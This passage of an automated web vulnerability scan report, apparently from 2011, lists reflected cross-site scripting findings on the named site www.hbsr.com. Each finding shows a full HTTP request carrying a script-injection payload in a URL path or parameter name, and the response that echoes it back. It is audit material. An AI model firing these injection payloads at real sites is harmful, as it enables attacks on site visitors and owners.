User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739-print">
...[SNIP]...

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/contact_us/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feddf"><script>alert(1)</script>141aece0633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/index?feddf"><script>alert(1)</script>141aece0633=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/index?feddf"><script>alert(1)</script>141aece0633=1&printable=yes">
...[SNIP]...

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd51"><script>alert(1)</script>5aa86bd4b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74-print">
...[SNIP]...

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ee3"><script>alert(1)</script>d9e5dbdc1f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england-print">
...[SNIP]...

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 816d8"><script>alert(1)</script>9a9e300e5c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5-print">
...[SNIP]...

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b011"><script>alert(1)</script>c99e597bca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1&printable=yes">
...[SNIP]...

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/news_events/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee970"><script>alert(1)</script>a8722f44815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsee970"><script>alert(1)</script>a8722f44815/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsee970"><script>alert(1)</script>a8722f44815/index-print">
...[SNIP]...

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/news_events/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c57c0"><script>alert(1)</script>082bddadd32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/indexc57c0"><script>alert(1)</script>082bddadd32 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/indexc57c0"><script>alert(1)</script>082bddadd32-print">
...[SNIP]...

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/news_events/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00f"><script>alert(1)</script>81755691be4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/index?de00f"><script>alert(1)</script>81755691be4=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/index?de00f"><script>alert(1)</script>81755691be4=1&printable=yes">
...[SNIP]...

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf7c"><script>alert(1)</script>b8520e48e4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology-print">
...[SNIP]...

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae3f"><script>alert(1)</script>535c552892a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a-print">
...[SNIP]...

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/biotechnology

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406d7"><script>alert(1)</script>6b5c14438ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1&printable=yes">
...[SNIP]...

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3ab"><script>alert(1)</script>633a1638eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index-print">
...[SNIP]...

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66193"><script>alert(1)</script>5ba64a12336 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index66193"><script>alert(1)</script>5ba64a12336 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index66193"><script>alert(1)</script>5ba64a12336-print">
...[SNIP]...

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23205"><script>alert(1)</script>ebacbb96fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1&printable=yes">
...[SNIP]...

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940d0"><script>alert(1)</script>8c7d3e9285e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
